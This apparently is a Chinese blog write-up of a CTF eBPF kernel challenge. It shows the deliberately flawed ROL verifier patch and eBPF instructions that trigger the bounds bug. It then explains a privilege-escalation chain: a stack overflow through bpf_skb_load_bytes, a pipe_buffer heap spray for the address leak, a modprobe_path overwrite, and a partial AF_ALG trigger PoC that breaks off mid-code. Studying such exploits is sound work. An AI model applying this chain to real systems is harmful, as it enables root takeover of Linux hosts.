Jailbreaking eBPF

写在最前面

由于考研的缘故,博客的更新频率大幅度下降(也因为这个原因这篇博客笔者分了好几天来写),趁现在还没有进入冲刺阶段再水一篇(bushi

不知道为何,eBPF 这个老古董最近在 CTF 里面重新焕发了生机,这篇博客以 DownUnderCTF 2025 的 Rolling Around 为例讲解一下 eBPF 漏洞的利用方式。为了展示更多的东西,笔者将会 “绕远路” ,使用稍微复杂一点的方法来进行漏洞的利用

漏洞分析

这里先给出 patch 文件
kernel.patch

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
diff --git a/include/uapi/linux/bpf.h b/include/uapi/linux/bpf.h
index 85180e4aa..5290a994d 100644
--- a/include/uapi/linux/bpf.h
+++ b/include/uapi/linux/bpf.h
@@ -34,6 +34,9 @@
#define BPF_FROM_LE BPF_TO_LE
#define BPF_FROM_BE BPF_TO_BE

+/* alu fields */
+#define BPF_ROL 0xe0
+
/* jmp encodings */
#define BPF_JNE 0x50 /* jump != */
#define BPF_JLT 0xa0 /* LT is unsigned, '<' */
diff --git a/kernel/bpf/core.c b/kernel/bpf/core.c
index c20babbf9..b79fbeb46 100644
--- a/kernel/bpf/core.c
+++ b/kernel/bpf/core.c
@@ -1578,6 +1578,7 @@ EXPORT_SYMBOL_GPL(__bpf_call_base);
INSN_3(ALU, ARSH, K), \
INSN_3(ALU, DIV, K), \
INSN_3(ALU, MOD, K), \
+ INSN_3(ALU, ROL, K), \
/* 64 bit ALU operations. */ \
/* Register based. */ \
INSN_3(ALU64, ADD, X), \
@@ -1607,6 +1608,7 @@ EXPORT_SYMBOL_GPL(__bpf_call_base);
INSN_3(ALU64, ARSH, K), \
INSN_3(ALU64, DIV, K), \
INSN_3(ALU64, MOD, K), \
+ INSN_3(ALU64, ROL, K), \
/* Call instruction. */ \
INSN_2(JMP, CALL), \
/* Exit instruction. */ \
@@ -1743,6 +1745,7 @@ static u64 ___bpf_prog_run(u64 *regs, const struct bpf_insn *insn)
[BPF_LDX | BPF_PROBE_MEMSX | BPF_H] = &&LDX_PROBE_MEMSX_H,
[BPF_LDX | BPF_PROBE_MEMSX | BPF_W] = &&LDX_PROBE_MEMSX_W,
};
+
#undef BPF_INSN_3_LBL
#undef BPF_INSN_2_LBL
u32 tail_call_cnt = 0;
@@ -1859,6 +1862,12 @@ static u64 ___bpf_prog_run(u64 *regs, const struct bpf_insn *insn)
ALU64_ARSH_K:
(*(s64 *) &DST) >>= IMM;
CONT;
+ ALU_ROL_K:
+ DST = (((u32)DST) << IMM) | (((u32)DST) >> (32 - IMM));
+ CONT;
+ ALU64_ROL_K:
+ DST = (DST << IMM) | (DST >> (64 - IMM));
+ CONT;
ALU64_MOD_X:
switch (OFF) {
case 0:
diff --git a/kernel/bpf/disasm.c b/kernel/bpf/disasm.c
index 20883c6b1..859662559 100644
--- a/kernel/bpf/disasm.c
+++ b/kernel/bpf/disasm.c
@@ -85,6 +85,7 @@ const char *const bpf_alu_string[16] = {
[BPF_MOV >> 4] = "=",
[BPF_ARSH >> 4] = "s>>=",
[BPF_END >> 4] = "endian",
+ [BPF_ROL >> 4] = "rol",
};

static const char *const bpf_alu_sign_string[16] = {
diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index a7d6e0c59..d2f97d018 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -14091,8 +14091,8 @@ static int sanitize_ptr_alu(struct bpf_verifier_env *env,
bool ptr_is_dst_reg = ptr_reg == dst_reg;
u8 opcode = BPF_OP(insn->code);
u32 alu_state, alu_limit;
- struct bpf_reg_state tmp;
- bool ret;
+ //struct bpf_reg_state tmp;
+ //bool ret;
int err;

if (can_skip_alu_sanitation(env, insn))
@@ -14161,6 +14161,8 @@ static int sanitize_ptr_alu(struct bpf_verifier_env *env,
* and truncated reg-based in the other in order to explore
* bad access.
*/
+
+ /*
if (!ptr_is_dst_reg) {
tmp = *dst_reg;
copy_register_state(dst_reg, ptr_reg);
@@ -14170,6 +14172,8 @@ static int sanitize_ptr_alu(struct bpf_verifier_env *env,
if (!ptr_is_dst_reg && ret)
*dst_reg = tmp;
return !ret ? REASON_STACK : 0;
+ */
+ return 0;
}

static void sanitize_mark_insn_seen(struct bpf_verifier_env *env)
@@ -15050,6 +15054,48 @@ static void scalar_min_max_arsh(struct bpf_reg_state *dst_reg,
__update_reg_bounds(dst_reg);
}

+static void __scalar32_min_max_rol(struct bpf_reg_state *dst_reg,
+ u64 umin_val, u64 umax_val)
+{
+ dst_reg->u32_min_value = (dst_reg->u32_min_value << umin_val) | (dst_reg->u32_min_value >> (64 - umin_val));
+ dst_reg->u32_max_value = (dst_reg->u32_max_value << umax_val) | (dst_reg->u32_max_value >> (64 - umax_val));
+}
+
+static void scalar32_min_max_rol(struct bpf_reg_state *dst_reg,
+ struct bpf_reg_state *src_reg)
+{
+ u32 umax_val = src_reg->u32_max_value;
+ u32 umin_val = src_reg->u32_min_value;
+ /* u32 alu operation will zext upper bits */
+ struct tnum subreg = tnum_subreg(dst_reg->var_off);
+
+ __scalar32_min_max_rol(dst_reg, umin_val, umax_val);
+ dst_reg->var_off = tnum_subreg(tnum_lshift(subreg, umin_val));
+ __mark_reg64_unbounded(dst_reg);
+ __update_reg32_bounds(dst_reg);
+}
+
+static void __scalar64_min_max_rol(struct bpf_reg_state *dst_reg,
+ u64 umin_val, u64 umax_val)
+{
+ dst_reg->umin_value = (dst_reg->umin_value << umin_val) | (dst_reg->umin_value >> (64 - umin_val));
+ dst_reg->umax_value = (dst_reg->umax_value << umax_val) | (dst_reg->umax_value >> (64 - umax_val));
+}
+
+static void scalar_min_max_rol(struct bpf_reg_state *dst_reg,
+ struct bpf_reg_state *src_reg)
+{
+ u64 umax_val = src_reg->umax_value;
+ u64 umin_val = src_reg->umin_value;
+
+ __scalar64_min_max_rol(dst_reg, umin_val, umax_val);
+ __scalar32_min_max_rol(dst_reg, umin_val, umax_val);
+
+ dst_reg->var_off = tnum_lshift(dst_reg->var_off, umin_val);
+ /* We may learn something more from the var_off */
+ __update_reg_bounds(dst_reg);
+}
+
static bool is_safe_to_compute_dst_reg_range(struct bpf_insn *insn,
const struct bpf_reg_state *src_reg)
{
@@ -15084,12 +15130,14 @@ static bool is_safe_to_compute_dst_reg_range(struct bpf_insn *insn,
case BPF_LSH:
case BPF_RSH:
case BPF_ARSH:
+ case BPF_ROL:
return (src_is_const && src_reg->umax_value < insn_bitness);
default:
return false;
}
}

+
/* WARNING: This function does calculations on 64-bit values, but the actual
* execution may occur on 32-bit values. Therefore, things like bitshifts
* need extra checks in the 32-bit case.
@@ -15177,6 +15225,12 @@ static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env,
else
scalar_min_max_arsh(dst_reg, &src_reg);
break;
+ case BPF_ROL:
+ if (alu32)
+ scalar32_min_max_rol(dst_reg, &src_reg);
+ else
+ scalar_min_max_rol(dst_reg, &src_reg);
+ break;
default:
break;
}
@@ -15185,6 +15239,7 @@ static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env,
if (alu32)
zext_32_to_64(dst_reg);
reg_bounds_sync(dst_reg);
+
return 0;
}

@@ -15510,7 +15565,7 @@ static int check_alu_op(struct bpf_verifier_env *env, struct bpf_insn *insn)
}
}

- } else if (opcode > BPF_END) {
+ } else if (opcode > BPF_ROL) {
verbose(env, "invalid BPF_ALU opcode %x\n", opcode);
return -EINVAL;

@@ -15546,7 +15601,7 @@ static int check_alu_op(struct bpf_verifier_env *env, struct bpf_insn *insn)
}

if ((opcode == BPF_LSH || opcode == BPF_RSH ||
- opcode == BPF_ARSH) && BPF_SRC(insn->code) == BPF_K) {
+ opcode == BPF_ARSH || opcode == BPF_ROL) && BPF_SRC(insn->code) == BPF_K) {
int size = BPF_CLASS(insn->code) == BPF_ALU64 ? 64 : 32;

if (insn->imm < 0 || insn->imm >= size) {

环境的 kernel 版本为 6.15

1
2
/ $ uname -r
6.15.0-gf66bc387efbe-dirty

这个 patch 实现了一个 eBPF 立即数的循环左移(rotate left,即 ROL)运算,支持 32 位和 64 位,漏洞为 __scalar32_min_max_rol 函数中错误地使用了 64 而不是 32,导致寄存器状态的最小值/最大值跟踪逻辑错误

1
2
3
4
5
6
7
8
9
10
11
12
13
14
......

+ ALU_ROL_K:

+ DST = (((u32)DST) << IMM) | (((u32)DST) >> (32 - IMM));
......

+static void __scalar32_min_max_rol(struct bpf_reg_state *dst_reg,
+ u64 umin_val, u64 umax_val)
+{
+ dst_reg->u32_min_value = (dst_reg->u32_min_value << umin_val) | (dst_reg->u32_min_value >> (64 - umin_val));
+ dst_reg->u32_max_value = (dst_reg->u32_max_value << umax_val) | (dst_reg->u32_max_value >> (64 - umax_val));

......

当 umin_val 或 umax_val 在 [1, 31] 范围内时,64 - umin_val 的结果(如 33-63)会导致右移位数过大,使有效位被移出,计算结果归零

例如:
若 u32_min_value = 0x80000000(最高位为 1),umin_val = 1
正确 ROL 结果应为 0x00000001
错误计算:(0x80000000 << 1) | (0x80000000 >> 63) = 0x00000000 | 0x00000000 = 0(实际应为 1)

也就是说我们可以利用这个逻辑错误构造出一个实际值为 1,而 verifier 却认为是 0 的数,进而绕过 eBPF 里面的安全检测,可用以下 eBPF 程序实现:

1
2
3
BPF_MOV32_IMM(BPF_REG_6, 0x2),                                  // R6 = 0x2
BPF_ALU32_IMM(224, BPF_REG_6, 31), // R6 << 31
BPF_ALU64_IMM(BPF_AND, BPF_REG_6, 0x1), // R6 = 0x1 [verifier 0]

漏洞利用

重要结构体

在这之前先介绍两个比较重要的结构体,这将会在我们后续的利用中用到

bpf map 是一个通用的用以储存不同种类数据的结构,用以在用户进程与 eBPF 程序、eBPF 程序与 eBPF 程序之间进行数据共享,这些数据以二进制形式储存,因此用户在创建时只需要指定 key 与 value 的 size

bpf_map

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
struct bpf_map {
const struct bpf_map_ops * ops; /* 0 8 */
struct bpf_map * inner_map_meta; /* 8 8 */
void * security; /* 16 8 */
enum bpf_map_type map_type; /* 24 4 */
u32 key_size; /* 28 4 */
u32 value_size; /* 32 4 */
u32 max_entries; /* 36 4 */
u64 map_extra; /* 40 8 */
u32 map_flags; /* 48 4 */
u32 id; /* 52 4 */
struct btf_record * record; /* 56 8 */
/* --- cacheline 1 boundary (64 bytes) --- */
int numa_node; /* 64 4 */
u32 btf_key_type_id; /* 68 4 */
u32 btf_value_type_id; /* 72 4 */
u32 btf_vmlinux_value_type_id; /* 76 4 */
struct btf * btf; /* 80 8 */
char name[16]; /* 88 16 */
struct mutex freeze_mutex; /* 104 32 */
/* --- cacheline 2 boundary (128 bytes) was 8 bytes ago --- */
atomic64_t refcnt; /* 136 8 */
atomic64_t usercnt; /* 144 8 */
union {
struct work_struct work; /* 152 32 */
struct callback_head rcu; /* 152 16 */
}; /* 152 32 */
atomic64_t writecnt; /* 184 8 */
/* --- cacheline 3 boundary (192 bytes) --- */
struct {
const struct btf_type * attach_func_proto; /* 192 8 */
spinlock_t lock; /* 200 4 */
enum bpf_prog_type type; /* 204 4 */
bool jited; /* 208 1 */
bool xdp_has_frags; /* 209 1 */
} owner; /* 192 24 */

/* XXX last struct has 6 bytes of padding */

bool bypass_spec_v1; /* 216 1 */
bool frozen; /* 217 1 */
bool free_after_mult_rcu_gp; /* 218 1 */
bool free_after_rcu_gp; /* 219 1 */

/* XXX 4 bytes hole, try to pack */

atomic64_t sleepable_refcnt; /* 224 8 */
s64 * elem_count; /* 232 8 */

/* size: 240, cachelines: 4, members: 29 */
/* sum members: 236, holes: 1, sum holes: 4 */
/* paddings: 1, sum paddings: 6 */
/* last cacheline: 48 bytes */
};

bpf map 主要有以下五个基本属性:

  • type:map 的数据结构类型
  • key_size:以字节为单位的用以索引一个元素的 key 的 size(在数组映射中使用)
  • value_size:以字节为单位的每个元素的 size
  • max_entries:map 中 entries 的最大数量
  • map_flags:描述 map 的独特特征,例如是否整个 map 的内存应被预先分配等

可选 map 类型如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
enum bpf_map_type {
BPF_MAP_TYPE_UNSPEC,
BPF_MAP_TYPE_HASH,
BPF_MAP_TYPE_ARRAY,
BPF_MAP_TYPE_PROG_ARRAY,
BPF_MAP_TYPE_PERF_EVENT_ARRAY,
BPF_MAP_TYPE_PERCPU_HASH,
BPF_MAP_TYPE_PERCPU_ARRAY,
BPF_MAP_TYPE_STACK_TRACE,
BPF_MAP_TYPE_CGROUP_ARRAY,
BPF_MAP_TYPE_LRU_HASH,
BPF_MAP_TYPE_LRU_PERCPU_HASH,
BPF_MAP_TYPE_LPM_TRIE,
BPF_MAP_TYPE_ARRAY_OF_MAPS,
BPF_MAP_TYPE_HASH_OF_MAPS,
BPF_MAP_TYPE_DEVMAP,
BPF_MAP_TYPE_SOCKMAP,
BPF_MAP_TYPE_CPUMAP,
BPF_MAP_TYPE_XSKMAP,
BPF_MAP_TYPE_SOCKHASH,
BPF_MAP_TYPE_CGROUP_STORAGE_DEPRECATED,
/* BPF_MAP_TYPE_CGROUP_STORAGE is available to bpf programs attaching
* to a cgroup. The newer BPF_MAP_TYPE_CGRP_STORAGE is available to
* both cgroup-attached and other progs and supports all functionality
* provided by BPF_MAP_TYPE_CGROUP_STORAGE. So mark
* BPF_MAP_TYPE_CGROUP_STORAGE deprecated.
*/
BPF_MAP_TYPE_CGROUP_STORAGE = BPF_MAP_TYPE_CGROUP_STORAGE_DEPRECATED,
BPF_MAP_TYPE_REUSEPORT_SOCKARRAY,
BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE,
BPF_MAP_TYPE_QUEUE,
BPF_MAP_TYPE_STACK,
BPF_MAP_TYPE_SK_STORAGE,
BPF_MAP_TYPE_DEVMAP_HASH,
BPF_MAP_TYPE_STRUCT_OPS,
BPF_MAP_TYPE_RINGBUF,
BPF_MAP_TYPE_INODE_STORAGE,
BPF_MAP_TYPE_TASK_STORAGE,
BPF_MAP_TYPE_BLOOM_FILTER,
BPF_MAP_TYPE_USER_RINGBUF,
BPF_MAP_TYPE_CGRP_STORAGE,
};

常用的主要是以下几种类型:

  • BPF_MAP_TYPE_HASH:以哈希表形式存储键值对,比较常规
  • BPF_MAP_TYPE_ARRAY:以数组形式存储键值对,key 即为数组下标,对应的 value 皆初始化为 0
  • BPF_MAP_TYPE_PROG_ARRAY:特殊的数组映射,value 为其他 eBPF 程序的文件描述符
  • BPF_MAP_TYPE_STACK:以栈形式存储数据

当我们在用户态创建一个 bpf_array 的 bpf_map 时,内核态就会创建一个 bpf_array 结构体

bpf_array

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
struct bpf_array {
struct bpf_map map; /* 0 240 */
/* --- cacheline 3 boundary (192 bytes) was 48 bytes ago --- */
u32 elem_size; /* 240 4 */
u32 index_mask; /* 244 4 */
struct bpf_array_aux * aux; /* 248 8 */
/* --- cacheline 4 boundary (256 bytes) --- */
union {
struct {
struct {
} __empty_value; /* 256 0 */
char value[0]; /* 256 0 */
}; /* 256 0 */
struct {
struct {
} __empty_ptrs; /* 256 0 */
void * ptrs[0]; /* 256 0 */
}; /* 256 0 */
struct {
struct {
} __empty_pptrs; /* 256 0 */
void * pptrs[0]; /* 256 0 */
}; /* 256 0 */
}; /* 256 0 */

/* size: 256, cachelines: 4, members: 5 */
};

value 数组存放在 bpf_array 的最下方。这里需要注意的是,value 的数量以及大小是可控的,也就是说这个 bpf_array 结构体的大小也是可控的,这极大地方便了我们后续漏洞的利用。

地址泄露

有了个实际值为 1 而 verifier 为 0 的寄存器(后面称为 victim_reg)后,我们就能够构造出各种指针越界或者绕过各种 eBPF 内部的长度检测。

但是我们不能直接将 victim_reg 直接与指针进行运算,因为在下面这个 commit 中对 ALU Sanitation 进行了进一步的加强

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152

diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index e41b6326e3e67c..0399ac092b3639 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -5871,7 +5871,7 @@ static int retrieve_ptr_limit(const struct bpf_reg_state *ptr_reg,
bool off_is_neg = off_reg->smin_value < 0;
bool mask_to_left = (opcode == BPF_ADD && off_is_neg) ||
(opcode == BPF_SUB && !off_is_neg);
- u32 off, max = 0, ptr_limit = 0;
+ u32 max = 0, ptr_limit = 0;

if (!tnum_is_const(off_reg->var_off) &&
(off_reg->smin_value < 0) != (off_reg->smax_value < 0))
@@ -5880,26 +5880,18 @@ static int retrieve_ptr_limit(const struct bpf_reg_state *ptr_reg,
switch (ptr_reg->type) {
case PTR_TO_STACK:
/* Offset 0 is out-of-bounds, but acceptable start for the
- * left direction, see BPF_REG_FP.
+ * left direction, see BPF_REG_FP. Also, unknown scalar
+ * offset where we would need to deal with min/max bounds is
+ * currently prohibited for unprivileged.
*/
max = MAX_BPF_STACK + mask_to_left;
- /* Indirect variable offset stack access is prohibited in
- * unprivileged mode so it's not handled here.
- */
- off = ptr_reg->off + ptr_reg->var_off.value;
- if (mask_to_left)
- ptr_limit = MAX_BPF_STACK + off;
- else
- ptr_limit = -off - 1;
+ ptr_limit = -(ptr_reg->var_off.value + ptr_reg->off);
break;
case PTR_TO_MAP_VALUE:
max = ptr_reg->map_ptr->value_size;
- if (mask_to_left) {
- ptr_limit = ptr_reg->umax_value + ptr_reg->off;
- } else {
- off = ptr_reg->smin_value + ptr_reg->off;
- ptr_limit = ptr_reg->map_ptr->value_size - off - 1;
- }
+ ptr_limit = (mask_to_left ?
+ ptr_reg->smin_value :
+ ptr_reg->umax_value) + ptr_reg->off;
break;
default:
return REASON_TYPE;
@@ -5954,10 +5946,12 @@ static int sanitize_ptr_alu(struct bpf_verifier_env *env,
struct bpf_insn *insn,
const struct bpf_reg_state *ptr_reg,
const struct bpf_reg_state *off_reg,
- struct bpf_reg_state *dst_reg)
+ struct bpf_reg_state *dst_reg,
+ struct bpf_insn_aux_data *tmp_aux,
+ const bool commit_window)
{
+ struct bpf_insn_aux_data *aux = commit_window ? cur_aux(env) : tmp_aux;
struct bpf_verifier_state *vstate = env->cur_state;
- struct bpf_insn_aux_data *aux = cur_aux(env);
bool off_is_neg = off_reg->smin_value < 0;
bool ptr_is_dst_reg = ptr_reg == dst_reg;
u8 opcode = BPF_OP(insn->code);
@@ -5976,18 +5970,33 @@ static int sanitize_ptr_alu(struct bpf_verifier_env *env,
if (vstate->speculative)
goto do_sim;

- alu_state = off_is_neg ? BPF_ALU_NEG_VALUE : 0;
- alu_state |= ptr_is_dst_reg ?
- BPF_ALU_SANITIZE_SRC : BPF_ALU_SANITIZE_DST;
-
err = retrieve_ptr_limit(ptr_reg, off_reg, &alu_limit, opcode);
if (err < 0)
return err;

+ if (commit_window) {
+ /* In commit phase we narrow the masking window based on
+ * the observed pointer move after the simulated operation.
+ */
+ alu_state = tmp_aux->alu_state;
+ alu_limit = abs(tmp_aux->alu_limit - alu_limit);
+ } else {
+ alu_state = off_is_neg ? BPF_ALU_NEG_VALUE : 0;
+ alu_state |= ptr_is_dst_reg ?
+ BPF_ALU_SANITIZE_SRC : BPF_ALU_SANITIZE_DST;
+ }
+
err = update_alu_sanitation_state(aux, alu_state, alu_limit);
if (err < 0)
return err;
do_sim:
+ /* If we're in commit phase, we're done here given we already
+ * pushed the truncated dst_reg into the speculative verification
+ * stack.
+ */
+ if (commit_window)
+ return 0;
+
/* Simulate and find potential out-of-bounds access under
* speculative execution from truncation as a result of
* masking when off was not within expected range. If off
@@ -6130,6 +6139,7 @@ static int adjust_ptr_min_max_vals(struct bpf_verifier_env *env,
smin_ptr = ptr_reg->smin_value, smax_ptr = ptr_reg->smax_value;
u64 umin_val = off_reg->umin_value, umax_val = off_reg->umax_value,
umin_ptr = ptr_reg->umin_value, umax_ptr = ptr_reg->umax_value;
+ struct bpf_insn_aux_data tmp_aux = {};
u8 opcode = BPF_OP(insn->code);
u32 dst = insn->dst_reg;
int ret;
@@ -6196,12 +6206,15 @@ static int adjust_ptr_min_max_vals(struct bpf_verifier_env *env,
/* pointer types do not carry 32-bit bounds at the moment. */
__mark_reg32_unbounded(dst_reg);

- switch (opcode) {
- case BPF_ADD:
- ret = sanitize_ptr_alu(env, insn, ptr_reg, off_reg, dst_reg);
+ if (sanitize_needed(opcode)) {
+ ret = sanitize_ptr_alu(env, insn, ptr_reg, off_reg, dst_reg,
+ &tmp_aux, false);
if (ret < 0)
return sanitize_err(env, insn, ret, off_reg, dst_reg);
+ }

+ switch (opcode) {
+ case BPF_ADD:
/* We can take a fixed offset as long as it doesn't overflow
* the s32 'off' field
*/
@@ -6252,10 +6265,6 @@ static int adjust_ptr_min_max_vals(struct bpf_verifier_env *env,
}
break;
case BPF_SUB:
- ret = sanitize_ptr_alu(env, insn, ptr_reg, off_reg, dst_reg);
- if (ret < 0)
- return sanitize_err(env, insn, ret, off_reg, dst_reg);
-
if (dst_reg == off_reg) {
/* scalar -= pointer. Creates an unknown scalar */
verbose(env, "R%d tried to subtract pointer from scalar\n",
@@ -6338,6 +6347,12 @@ static int adjust_ptr_min_max_vals(struct bpf_verifier_env *env,

if (sanitize_check_bounds(env, insn, dst_reg) < 0)
return -EACCES;
+ if (sanitize_needed(opcode)) {
+ ret = sanitize_ptr_alu(env, insn, dst_reg, off_reg, dst_reg,
+ &tmp_aux, true);
+ if (ret < 0)
+ return sanitize_err(env, insn, ret, off_reg, dst_reg);
+ }

return 0;
}

alu_limit 的计算方式发生了改变,不是使用指针寄存器的当前位置,而是使用一个 offset 寄存器
被认为是常数的寄存器赋值会被直接更改为常量赋值

这个时候我们可以利用 bpf_skb_load_bytes 这个函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
long bpf_skb_load_bytes(const void *skb, u32 offset, void *to,
u32 len)

Description
This helper was provided as an easy way to load
data from a packet. It can be used to load len
bytes from offset from the packet associated to
skb, into the buffer pointed by to.

Since Linux 4.7, usage of this helper has mostly
been replaced by "direct packet access", enabling
packet data to be manipulated with skb->data and
skb->data_end pointing respectively to the first
byte of packet data and to the byte after the last
byte of packet data. However, it remains useful if
one wishes to read large quantities of data at once
from a packet into the eBPF stack.

Return 0 on success, or a negative error in case of
failure.

bpf_skb_load_bytes 函数可以将 skb 数据包中的数据拷贝到 eBPF 的栈上,且长度可控。我们可以将 bpf_map 的 value 指针保存在 eBPF stack 上然后利用 victim_reg 构造一个非法的 size 令 bpf_skb_load_bytes 在拷贝时出现越界进而修改 value 指针。

我们知道 value 指针是指向 bpf_array 的下方的 value,而这个地址是在堆上的。我们暂时不管 bpf_array 是在哪个 kmem_cache 中分配的,我们直接把目光放向别的 kmem_cache

上面我们分析过 bpf_array 的 size 是可控的,也就是说我们可以令这玩意分配到几乎所有我们想要的 order 上(附近有结构体那种😇🤣),而我们可以在与这个 bpf_array 的 slab 相邻的 page 上喷任何我们想要的结构体(对于不同 order 的结构体我们可以相应的修改 bpf_array 的 order 使之与之相邻)

这时候我们利用 bpf_skb_load_bytes 的溢出修改 value 指针的低 2 字节为 \x?0\x00(?的取值为 0-15,这里循环修改 16 次),在进行合理的页风水的情况下我们可以接近百分百的让 value 指向我们想要命中的结构体,进而利用 bpf_map_lookup_elem 从 value 中读取我们要泄露的地址信息。这里笔者选择在 bpf_array 附近喷 pipe_buffer,并通过泄露 pipe_buf_operations 进而泄露出内核的地址(当然也可以进行写操作)。总流程如下图:

任意地址写

在利用上面的方法泄露出地址后我们就可以顺理成章的利用 bpf_skb_load_bytes 将 value 覆盖为我们想要进行写入的地址即可,easy :)

这里我选择修改 modprobe 来进行提权,因为在 6.15+ 的 kernel 中 modprobe 的触发方式有所改变,为了所谓的 “绕远路” 这里选择了这个方法(其实笔者更想通过修改 PTE 来实现内核任意物理地址级别的读写)

高版本modprobe

在高版本的内核中存在下面这个 patch:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47

diff --git a/fs/exec.c b/fs/exec.c
index 4057b8c3e23391..e0435b31a811af 100644
--- a/fs/exec.c
+++ b/fs/exec.c
@@ -1723,13 +1723,11 @@ int remove_arg_zero(struct linux_binprm *bprm)
}
EXPORT_SYMBOL(remove_arg_zero);

-#define printable(c) (((c)=='\t') || ((c)=='\n') || (0x20<=(c) && (c)<=0x7e))
/*
* cycle the list of binary formats handler, until one recognizes the image
*/
static int search_binary_handler(struct linux_binprm *bprm)
{
- bool need_retry = IS_ENABLED(CONFIG_MODULES);
struct linux_binfmt *fmt;
int retval;

@@ -1741,8 +1739,6 @@ static int search_binary_handler(struct linux_binprm *bprm)
if (retval)
return retval;

- retval = -ENOENT;
- retry:
read_lock(&binfmt_lock);
list_for_each_entry(fmt, &formats, lh) {
if (!try_module_get(fmt->module))
@@ -1760,17 +1756,7 @@ static int search_binary_handler(struct linux_binprm *bprm)
}
read_unlock(&binfmt_lock);

- if (need_retry) {
- if (printable(bprm->buf[0]) && printable(bprm->buf[1]) &&
- printable(bprm->buf[2]) && printable(bprm->buf[3]))
- return retval;
- if (request_module("binfmt-%04x", *(ushort *)(bprm->buf + 2)) < 0)
- return retval;
- need_retry = false;
- goto retry;
- }
-
- return retval;
+ return -ENOEXEC;
}

/* binfmt handlers will call back into begin_new_exec() on success. */

导致我们无法直接通过执行类似 \xff\xff\xff\xff 这样的命令来触发 modprobe_path :(
在 v6.14-rc1 之前的内核版本中,当用户尝试执行以幻数(例如 \xff\xff\xff\xff)开头的虚拟文件时,会触发以下调用堆栈:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
sys_execve()
=> do_execve()
=> do_execveat_common()
=> bprm_execve()
=> exec_binprm()
=> search_binary_handler()
=> request_module()
=> __request_module()
=> call_modprobe()
=> call_usermodehelper_exec()
=> queue_work(call_usermodehelper_exec_work)
[ kworker ]
call_usermodehelper_exec_work()
=> call_usermodehelper_exec_sync()
=> call_usermodehelper_exec_async()
=> kernel_execve()

在调用堆栈中,call_modprobe 从全局变量 modprobe_path 中检索文件路径,然后调用 call_usermodehelper_exec,在用户空间的指定路径处执行文件

查看这个 patch,调用 request_module 部分的代码已被完全删除,因此 search_binary_handler 不再调用 request_module

但我们依然能找到一些 syscall 可以调用它,Syzscope/SyzBridge 就曾 fuzz 过:

这里我们可以使用 AF_ALG socket,AF_ALG 是一个基于套接字的接口,允许用户空间访问内核的加密 API。当在此套接字上调用 bind 时,它会触发 alg_bind 函数。此函数搜索与用户提供的 sa->salg_type 相对应的类型,如果未找到,则调用 request_module 以尝试加载 “algif-%s” 模块

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
static const struct proto_ops alg_proto_ops = {
.family = PF_ALG,
.owner = THIS_MODULE,
...
.bind = alg_bind,
.release = af_alg_release,
.setsockopt = alg_setsockopt,
.accept = alg_accept,
};
static int alg_bind(struct socket *sock, struct sockaddr *uaddr, int addr_len)
{
const u32 allowed = CRYPTO_ALG_KERN_DRIVER_ONLY;
struct sock *sk = sock->sk;
struct alg_sock *ask = alg_sk(sk);
struct sockaddr_alg_new *sa = (void *)uaddr;
const struct af_alg_type *type;
void *private;
int err;
...
sa->salg_type[sizeof(sa->salg_type) - 1] = 0;
sa->salg_name[addr_len - sizeof(*sa) - 1] = 0;
type = alg_get_type(sa->salg_type);
if (PTR_ERR(type) == -ENOENT) {
request_module("algif-%s", sa->salg_type);
type = alg_get_type(sa->salg_type);
}

poc 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
/* PoC: trigger a modprobe_path invocation from an unprivileged process.
 *
 * Binding an AF_ALG socket with an unknown algorithm type makes alg_bind()
 * fail alg_get_type() with -ENOENT and call request_module("algif-%s", ...),
 * which reaches call_modprobe() and executes the file at modprobe_path in
 * userspace (see the quoted alg_bind() kernel code above).
 * Returns 1 unconditionally; the bind() itself is expected to fail —
 * the kernel-side module-load attempt is the desired side effect. */
int trigger_modprobe(){
struct sockaddr_alg sa;

int alg_fd = socket(AF_ALG, SOCK_SEQPACKET, 0);
if (alg_fd < 0) {
perror("socket(AF_ALG) failed");
